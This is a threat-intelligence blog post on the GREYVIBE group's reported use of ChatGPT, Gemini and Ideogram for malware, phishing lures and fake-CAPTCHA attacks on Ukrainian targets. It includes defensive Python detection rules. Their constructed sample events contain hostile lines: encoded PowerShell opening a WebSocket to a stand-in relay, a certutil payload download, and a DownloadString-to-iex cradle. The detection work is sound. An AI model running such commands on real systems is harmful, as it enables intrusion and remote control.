
GREYVIBE Hackers Use ChatGPT and Gemini to Power Cyberattacks

May 30, 2026


Introduction

A newly identified threat group called GREYVIBE is actively using generative AI tools, including ChatGPT and Google Gemini, to plan, build, and execute cyberattacks at scale.

This is not a theoretical risk. Researchers at WithSecure have tracked the group across multiple campaigns since at least August 2025 and documented its use of these tools.

The targets are real. Ukrainian government agencies, military organizations, and civilian institutions are in the crosshairs. But the implications stretch far beyond Ukraine's borders.

This campaign signals something broader and more dangerous: the democratization of sophisticated cyberattack capabilities through AI.

What Happened

WithSecure researchers identified GREYVIBE as a previously untracked threat actor with consistent overlaps in infrastructure, tooling, and operational behavior across several distinct campaigns.

The group was not publicly tracked before this disclosure. That alone should make security teams pause.

Key facts about the GREYVIBE campaign:

  • Active since: At least August 2025
  • Primary targets: Ukrainian government, military, and civilian sectors
  • AI tools abused: ChatGPT, Google Gemini, and Ideogram AI
  • Malware deployed: PhantomRelay (Windows RAT), FallSpy (Android spyware), LegionRelay (PowerShell RAT)
  • Delivery methods: Spear-phishing, fake CAPTCHA pages, fraudulent websites
  • Attribution indicators: Russian-language artifacts, Moscow time zone activity patterns, targeting aligned with Russian state interests

No definitive attribution has been confirmed. However, the group's behavior strongly aligns with Russian intelligence-gathering objectives tied to the ongoing Russia-Ukraine conflict.

Technical Analysis

This is where things get technically significant. GREYVIBE is not just a standard espionage group. They have integrated generative AI into nearly every stage of the attack lifecycle.

The Attack Chain

Stage 1: Initial Access

GREYVIBE employs a multi-vector approach to initial access:

  • Spear-phishing emails impersonating Ukrainian government agencies
  • Malicious archives distributed via legitimate cloud services such as Google Drive
  • Fake CAPTCHA verification pages designed to trick users into executing malicious commands
  • Fraudulent "adult club" websites specifically targeting Ukrainian military personnel

Stage 2: AI-Assisted Malware Development

This is the critical differentiator. WithSecure researchers found evidence of AI-generated code patterns inside GREYVIBE's custom tools:

  • The DAYLIGHT and TEASOUP loaders contain AI-generated obfuscation code
  • LegionRelay, a custom PowerShell-based remote access trojan, shows clear markers of LLM-assisted development
  • Phishing lure content, including imagery, was generated using Ideogram AI
  • ChatGPT and Gemini appear to have been used for code generation, lure writing, and post-compromise task support

Stage 3: Payload Execution

Once victims interact with the phishing lure or fake CAPTCHA, the following occurs:

  • Custom loaders silently execute in the background
  • Decoy documents are displayed to the victim to avoid suspicion
  • Nothing visible to the user indicates that an infection is under way

Stage 4: Persistence and Lateral Movement

After initial compromise, GREYVIBE establishes persistent footholds using:

  • LegionRelay for ongoing remote access via PowerShell
  • WebSocket-based command execution through PhantomRelay
  • File theft, screenshot capture, and messaging data exfiltration

Root Cause

The root cause of GREYVIBE's growing capability is AI-assisted development. The group demonstrates signs of limited technical sophistication in some areas. Yet their tools are functional, modular, and evolving rapidly because generative AI is compensating for skill gaps.

AI also makes traditional attribution harder. When code is AI-generated, fingerprinting threat actors through coding style becomes unreliable. Infrastructure reuse, operational timing and victimology still hold, which is how WithSecure clustered these campaigns in the first place.

Malware Breakdown

PhantomRelay:

  • Modular Windows remote access trojan (RAT)
  • Uses WebSockets for command and control communication
  • Enables remote command execution, file access, and data exfiltration

FallSpy:

  • Android spyware targeting mobile devices
  • Exfiltrates contacts, GPS location, and device metadata
  • Delivered through deceptive social engineering websites

LegionRelay:

  • Custom PowerShell-based RAT
  • Supports file theft and screenshot capture
  • Exfiltrates data from messaging applications
  • Contains a design flaw that exposed backend functionality to researchers

Security Implications

The design flaw in LegionRelay is worth noting for a different reason. It actually enabled WithSecure to monitor GREYVIBE's operations over an extended period. This is a double-edged sword: AI-assisted development accelerates tool creation but can also introduce flaws that defensive researchers exploit for intelligence gathering.

Why GREYVIBE Hackers Using ChatGPT and Gemini Matters to Your Organization

You might think this is a Ukraine-specific problem. It is not.

Enterprise impact:

  • AI-generated spear-phishing lures are more convincing, harder to detect, and faster to produce at scale
  • Traditional signature-based detection struggles with AI-obfuscated loaders
  • Attribution becomes harder when AI removes human coding fingerprints
  • Any organization with geopolitical relevance or connections to defense, energy, or government is a potential target

SMB impact:

  • Smaller organizations often lack the detection capabilities to catch AI-assisted social engineering
  • Credential theft via AI-polished phishing emails defeats awareness training that teaches users to look for spelling mistakes and awkward wording
  • Limited SOC resources make threat hunting for new, untracked groups extremely difficult

Cloud security implications:

  • GREYVIBE abused Google Drive to distribute malicious archives
  • Legitimate cloud services are being weaponized to bypass perimeter controls: the download arrives over TLS from a trusted, allow-listed domain, so URL reputation and many network inspection tools never see it as malicious

Financial and regulatory risks:

  • Data exfiltration from a GREYVIBE-style attack can trigger GDPR, HIPAA, or NIS2 obligations
  • Ransomware follow-on activity is a realistic escalation path
  • Incident response costs following a modular RAT compromise can run into six figures

Five Realistic GREYVIBE Attack Scenarios

Scenario 1: Government Agency Spear-Phishing

An attacker uses ChatGPT to craft a hyper-targeted spear-phishing email impersonating a senior official from a partner government agency. The email contains a Google Drive link to a malicious archive. The victim opens the document and sees a legitimate-looking decoy. PhantomRelay quietly installs in the background.

Scenario 2: Military Personnel Social Engineering via Fake Website

A Ukrainian military officer visits what appears to be a legitimate social or entertainment website. The site, built by GREYVIBE, delivers FallSpy to the officer's Android device. Location data, contacts, and device information are immediately exfiltrated to threat actor infrastructure.

Scenario 3: Fake CAPTCHA Delivering Command Execution

An employee at a civilian organization receives a link to what appears to be a document verification portal. The portal presents a fake CAPTCHA that instructs the user to paste a command into their terminal "to verify they are human." Executing the command installs LegionRelay and establishes persistent attacker access.

Scenario 4: Supply Chain Lateral Movement

GREYVIBE compromises a contractor with access to a government agency's internal systems. Using LegionRelay, the threat actor performs lateral movement across the supply chain network, stealing credentials and staging further access into the primary target environment.

Scenario 5: AI-Generated Phishing at Scale

Using Gemini to write content and Ideogram AI to generate convincing imagery, GREYVIBE launches a mass phishing campaign across hundreds of targets simultaneously. Because each AI-generated lure is unique, reputation and signature-based email filters have little reused content to match on.

Detection and Monitoring Strategies

Detecting GREYVIBE-style AI-powered threats requires layered visibility. Here is what security teams should prioritize.

Logging Recommendations

  • Enable full PowerShell script block logging and module logging across all endpoints; script block logging records the code as PowerShell actually runs it, so a payload that was only an encoded blob on the command line is logged in the clear once it executes
  • Log outbound WebSocket connections at the network perimeter, with the caveat that the Upgrade: websocket handshake is only visible in clear-text HTTP or at a TLS-inspecting proxy; for wss:// traffic elsewhere you see only a long-lived TLS session, so record connection duration and byte counts as well
  • Enable Windows Event IDs 4688 (process creation, Security log) and 4104 (PowerShell script block logging, Microsoft-Windows-PowerShell/Operational log); for 4688, turn on "Include command line in process creation events", since without the command line the event cannot show an -EncodedCommand
  • Log all cloud storage access events from Google Drive and similar platforms

EDR Monitoring

  • Alert on PowerShell spawning from unusual parent processes
  • Monitor for encoded command execution (the -EncodedCommand flag in PowerShell, which powershell.exe also accepts as -e, -ec or any longer prefix such as -enc)
  • Flag any process injecting into legitimate Windows processes
  • Detect anomalous use of certutil, mshta, regsvr32 for payload staging

SIEM Correlation Rules

  • Correlate cloud storage downloads followed by new process creation within short time windows
  • Alert on multiple failed authentication attempts followed by successful logins from unusual geolocations
  • Flag outbound connections to newly registered or low-reputation domains
  • Correlate a browser visit to a CAPTCHA-style verification page with an interactive shell (powershell.exe or cmd.exe) launched from explorer.exe on the same host shortly afterwards, the signature of the "paste this command to verify" lure
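Two of the correlation rules above, written out as runnable logic over a handful of constructed, already-normalized events. This is an added example, not WithSecure's detection content and not any SIEM's rule syntax. The event shape (a `type` of proxy, process or auth, ISO timestamps, `host` and `user` fields) and the per-user country baseline are assumptions; in practice they map onto your own normalized schema and a real lookback of prior successful logins.

```python
"""Two SIEM correlation rules from the bullets above, run over constructed events.
Added example: the event schema, hostnames, users and URLs are all invented."""
from collections import defaultdict
from datetime import datetime, timedelta

CLOUD_STORAGE = ("drive.google.com", "drive.usercontent.google.com",
                 "docs.google.com", "dropbox.com", "onedrive.live.com")
WINDOW = timedelta(seconds=120)   # download -> execution window on the same host
FAIL_THRESHOLD = 5                # failed logons that make a later success interesting
PROFILE_PATHS = ("\\downloads\\", "\\temp\\", "\\appdata\\")  # where browser downloads land


def parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def is_cloud_storage(url: str) -> bool:
    """Match the host part of a URL against known cloud-storage domains."""
    host = url.split("//", 1)[-1].split("/", 1)[0].lower()
    return any(host == d or host.endswith("." + d) for d in CLOUD_STORAGE)


def rule_cloud_download_then_exec(events):
    """Proxy download from a cloud-storage host, then within WINDOW a process on
    the same host whose image or command line sits under the user profile."""
    alerts, recent = [], defaultdict(list)  # host -> [(download time, url)]
    for ev in events:
        if ev["type"] == "proxy" and is_cloud_storage(ev["url"]):
            recent[ev["host"]].append((parse(ev["ts"]), ev["url"]))
        elif ev["type"] == "process":
            cmd = (ev["image"] + " " + ev.get("cmdline", "")).lower()
            if not any(p in cmd for p in PROFILE_PATHS):
                continue
            t = parse(ev["ts"])
            for dl_ts, url in recent[ev["host"]]:
                if timedelta(0) <= t - dl_ts <= WINDOW:
                    alerts.append({"rule": "cloud-download-then-exec", "host": ev["host"],
                                   "url": url, "image": ev["image"], "ts": ev["ts"]})
    return alerts


def rule_bruteforce_then_new_geo(events, baseline):
    """FAIL_THRESHOLD or more failed logons for a user, followed by a success from
    a country the user has no prior success from (baseline = constructed lookback)."""
    alerts, fails = [], defaultdict(int)
    seen = defaultdict(set, {u: set(c) for u, c in baseline.items()})
    for ev in events:
        if ev["type"] != "auth":
            continue
        user = ev["user"]
        if ev["result"] != "success":
            fails[user] += 1
            continue
        if fails[user] >= FAIL_THRESHOLD and ev["country"] not in seen[user]:
            alerts.append({"rule": "bruteforce-then-new-geo", "user": user, "country": ev["country"],
                           "failures": fails[user], "ts": ev["ts"]})
        seen[user].add(ev["country"])
        fails[user] = 0  # a success closes the failure streak
    return alerts


def correlate(events, baseline):
    events = sorted(events, key=lambda e: e["ts"])
    return rule_cloud_download_then_exec(events) + rule_bruteforce_then_new_geo(events, baseline)


# Constructed sample telemetry (not real GREYVIBE data). WS-042 downloads an archive
# from Drive and runs an executable out of Downloads 36 seconds later; j.doe then has
# five failed logons followed by a success from a country outside the baseline.
SAMPLE_EVENTS = [
    {"ts": "2026-05-30T09:14:05", "type": "proxy", "host": "WS-042", "user": "j.doe",
     "url": "https://drive.usercontent.google.com/download?id=1aBcD&export=download"},
    {"ts": "2026-05-30T09:14:41", "type": "process", "host": "WS-042", "user": "j.doe",
     "image": r"C:\Users\j.doe\Downloads\Order_4471\Order_4471.exe", "cmdline": ""},
    {"ts": "2026-05-30T09:21:00", "type": "process", "host": "WS-017", "user": "a.lee",
     "image": r"C:\Users\a.lee\AppData\Local\Microsoft\Teams\current\Teams.exe", "cmdline": ""},
    {"ts": "2026-05-30T09:30:00", "type": "proxy", "host": "WS-042", "user": "j.doe",
     "url": "https://mail.google.com/mail/u/0/"},
    {"ts": "2026-05-30T09:30:30", "type": "process", "host": "WS-042", "user": "j.doe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "--type=renderer"},
] + [
    {"ts": f"2026-05-30T10:02:{s:02d}", "type": "auth", "user": "j.doe", "result": "fail", "country": "DE"}
    for s in range(5)
] + [
    {"ts": "2026-05-30T10:02:09", "type": "auth", "user": "j.doe", "result": "success", "country": "DE"},
    {"ts": "2026-05-30T10:05:00", "type": "auth", "user": "m.ivanov", "result": "success", "country": "UA"},
]
BASELINE = {"j.doe": {"UA", "PL"}, "m.ivanov": {"UA"}}

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, BASELINE):
        print(alert)
```

The download-then-execute rule is scoped per host and to images under the user profile, which is where an archive opened from the browser lands; per-user installers and updaters under AppData will trip it after an unrelated Drive download, so pair it with a signed-publisher allow-list or narrow the path set to Downloads and Temp. The new-geo rule is only as good as its baseline: without prior successes to compare against, every user's first login in the window would look new.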

Threat Hunting Guidance

  • Hunt for PowerShell scripts containing Base64-encoded strings communicating over WebSockets
  • Search for recently created scheduled tasks or registry run keys not aligned with known software
  • Look for Android device management traffic patterns inconsistent with corporate MDM profiles
  • Hunt for AI-generated content markers in phishing emails using LLM detection tooling, treating the result as a weak signal only; text detectors of this kind have high false-positive and false-negative rates
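The EDR rules listed above and the WebSocket hunt from this section, as an added example in Python that is not WithSecure's detection logic and not anything recovered from GREYVIBE. It runs over constructed 4688 (process creation) and 4104 (script block) records: the field names match the Windows event schema, but hosts, paths, URLs and the embedded command are invented. It decodes `-EncodedCommand` payloads (base64 of UTF-16LE, matched on any prefix of the flag that powershell.exe accepts), flags PowerShell launched from explorer.exe or an Office or browser process, flags certutil, mshta and regsvr32 staging, and scans both decoded payloads and 4104 script blocks for WebSocket clients, download cradles and embedded base64.

```python
"""Detection rules for the EDR-monitoring and threat-hunting bullets above.
Added example, not WithSecure's or GREYVIBE's code. Events are constructed to
resemble Windows 4688 (process creation) and 4104 (script block) records:
field names follow the Windows schema, values are invented."""
import base64
import re

# Parents that should rarely launch PowerShell. explorer.exe covers the fake-CAPTCHA
# case, where the user pastes a command into the Run box or a shell.
SUSPICIOUS_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "chrome.exe", "msedge.exe"}
# LOLBin invocations that pull a payload from the network or decode one on disk.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "mshta.exe":    re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:\S*https?://|scrobj\.dll", re.I),
}
WEBSOCKET = re.compile(r"System\.Net\.WebSockets|ClientWebSocket|\bwss?://", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
B64_BLOB = re.compile(r"FromBase64String\s*\(|[A-Za-z0-9+/]{100,}={0,2}")


def ps_encode(script: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    powershell.exe accepts any unambiguous prefix of the flag (-e, -ec, -en, -enc ...),
    so the rule matches on prefix rather than the full name."""
    for m in re.finditer(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline, re.I):
        flag, blob = m.group(1).lower(), m.group(2)
        if flag not in ("e", "ec") and not "encodedcommand".startswith(flag):
            continue  # -ep / -exec are ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # malformed payload: nothing decodable to scan
    return None


def analyze_script(script: str) -> list:
    """Content rules shared by decoded -enc payloads and 4104 script blocks."""
    findings = []
    if WEBSOCKET.search(script):
        findings.append("websocket client in script")
    if CRADLE.search(script):
        findings.append("download cradle")
    if B64_BLOB.search(script):
        findings.append("embedded base64 blob")
    return findings


def analyze_process(ev: dict) -> list:
    """Rules for one 4688 event: parent, hidden window, -enc payload, LOLBin staging."""
    image = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")  # empty unless command-line auditing is enabled
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        if parent in SUSPICIOUS_PARENTS:
            findings.append(f"powershell spawned by {parent}")
        if re.search(r"(?:^|\s)-w[a-z]*\s+hidden\b", cmd, re.I):  # -w / -WindowStyle hidden
            findings.append("hidden window")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded command")
            findings.extend(analyze_script(decoded))
    elif image in LOLBIN_PATTERNS and LOLBIN_PATTERNS[image].search(cmd):
        findings.append(f"{image} payload staging")
    return findings


def triage(events: list) -> dict:
    """Map RecordId -> findings for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        if ev["EventID"] == 4688:
            findings = analyze_process(ev)
        elif ev["EventID"] == 4104:
            findings = analyze_script(ev.get("ScriptBlockText", ""))
        else:
            findings = []
        if findings:
            hits[ev["RecordId"]] = findings
    return hits


# Constructed sample telemetry. Record 2 mimics a fake-CAPTCHA "paste this to verify"
# command whose decoded body opens a WebSocket to a relay (invented hostname).
STAGE2 = ("$w=New-Object System.Net.WebSockets.ClientWebSocket;"
          "$w.ConnectAsync('wss://relay.example.invalid/ws',"
          "[Threading.CancellationToken]::None).Wait()")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 4688, "RecordId": 1, "NewProcessName": PS, "ParentProcessName": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"EventID": 4688, "RecordId": 2, "NewProcessName": PS, "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + ps_encode(STAGE2)},
    {"EventID": 4688, "RecordId": 3, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://cdn.example.invalid/up.dat C:\Users\Public\up.dat"},
    {"EventID": 4104, "RecordId": 4, "ScriptBlockText":
     "$d=[Convert]::FromBase64String($p);(New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/s')|iex"},
]

if __name__ == "__main__":
    for rid, findings in triage(SAMPLE_EVENTS).items():
        print(f"record {rid}: {', '.join(findings)}")
```

Record 2 is the fake-CAPTCHA pattern end to end: explorer.exe as parent, a hidden window, and an encoded command whose decoded body opens a `wss://` channel. The same `analyze_script` runs on 4104 text, which is why script block logging matters: once the decoded stage runs, its content lands in 4104 even when the only hint on the 4688 command line was an opaque base64 blob. Record 1, a management-agent script with `-ExecutionPolicy Bypass`, trips nothing, because the prefix check does not confuse `-ExecutionPolicy` with `-EncodedCommand`.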

Identity Security Monitoring

  • Monitor for credential stuffing patterns against authentication portals
  • Alert on service account usage outside of normal operational hours
  • Enforce conditional access policies blocking logins from unexpected geographies
  • Review OAuth application permissions granted by users across cloud platforms

Mitigation Recommendations

Immediate actions:

  • Audit all email security controls and update anti-phishing policies to account for AI-generated content
  • Use AppLocker or WDAC to block script files and executables launched from user-writable directories such as Downloads, Temp and AppData, and run PowerShell in Constrained Language Mode for standard users; blocking powershell.exe itself is rarely practical, since it lives in System32 and management tooling depends on it
  • Review and restrict cloud storage sharing permissions across all platforms
  • Implement application allow-listing on endpoints where possible

Patching and hardening:

  • Ensure all endpoints are running current OS and application patches
  • Disable unnecessary scripting engines on endpoints not requiring them
  • Harden Android device policies via MDM to restrict sideloading and unknown sources
  • Review and restrict macro execution in Office documents

Zero Trust and segmentation:

  • Apply Zero Trust principles to all remote access workflows
  • Segment networks to prevent lateral movement from compromised endpoints
  • Enforce least-privilege access across all user and service accounts
  • Implement microsegmentation in cloud environments

MFA and identity controls:

  • Enforce phishing-resistant MFA (FIDO2/WebAuthn security keys or passkeys) on all privileged accounts; SMS and app-generated one-time codes can be relayed through a phishing page and do not qualify
  • Implement MFA for all cloud storage access
  • Conduct access reviews to remove stale accounts and excessive permissions
  • Monitor for impossible travel and unusual authentication patterns

Detection and response preparation:

  • Deploy EDR with behavioral detection across all endpoints including mobile
  • Establish runbooks specifically for AI-assisted phishing and RAT compromise scenarios
  • Test incident response procedures against scenarios involving modular RAT toolkits
  • Validate backup integrity and test restoration procedures

Threat hunting and intelligence:

  • Subscribe to threat intelligence feeds covering Russian-aligned threat actors
  • Actively hunt across your environment for the GREYVIBE indicators of compromise published in the WithSecure report
  • Brief security awareness teams on AI-generated phishing characteristics
  • Share threat intelligence with sector peers and government CERTs

Why Cybersecurity Teams Should Pay Attention to GREYVIBE Hackers Using ChatGPT and Gemini

The GREYVIBE story is not just about one threat group. It is a preview of the threat landscape every security team will face over the next several years.

The broader trend is clear: generative AI is lowering the technical barrier to entry for cyberattacks. GREYVIBE demonstrates that even a group showing signs of operational immaturity can deploy modular malware, conduct multi-vector campaigns, and evade attribution when AI fills the skill gaps.

For SOC teams, this means alert fatigue will increase as AI enables volume attacks with highly varied lure content. For penetration testers and red teams, it means the adversary simulation bar is rising. For DevSecOps teams, it means security tooling that relies on static signatures or behavioral fingerprints will need to evolve.

What this means strategically:

  • AI-generated phishing will soon make traditional security awareness training partially obsolete
  • Threat attribution will become harder and slower as AI removes human fingerprints from malware
  • The attack surface is expanding as threat actors simultaneously abuse multiple AI platforms
  • Defenders need AI-powered detection to match AI-powered offense

The lesson from GREYVIBE is not to fear AI. It is to understand that the same tools your organization might use for productivity are now being weaponized by threat actors. That asymmetry demands a proactive, intelligence-led security posture.

Key Takeaway:

The emergence of GREYVIBE hackers using ChatGPT and Gemini to fuel cyberattacks is a watershed moment in modern cyber warfare. It confirms what many in the security community feared: generative AI is actively accelerating offensive cyber operations in real-world conflict zones.

This is not a future risk. It is happening now, with real malware, real victims, and real geopolitical consequences.

Key lessons for security teams:

  • AI-assisted threat actors can operate at higher sophistication levels than their underlying skills suggest
  • Multi-vector campaigns combining spear-phishing, fake CAPTCHAs, and fraudulent websites are increasingly common
  • Modular malware ecosystems like PhantomRelay, FallSpy, and LegionRelay are designed for persistence and adaptability
  • AI-generated code complicates attribution and challenges signature-based defenses
  • Even imperfect threat actors can cause significant damage with AI assistance

Long-term implications:

Security teams must treat AI-assisted threat activity as the new baseline, not the exception. Invest in behavioral detection, threat intelligence, and Zero Trust architecture now. Organizations that continue to rely on legacy perimeter security and static signature detection will find themselves increasingly exposed.

Proactive guidance:

  • Assume AI-generated phishing will reach your users
  • Build detection logic around behavior, not signatures
  • Treat cloud storage platforms as potential malware delivery vectors
  • Conduct regular red team exercises simulating AI-assisted attack chains

Copyright © Digital Warfare. All rights reserved.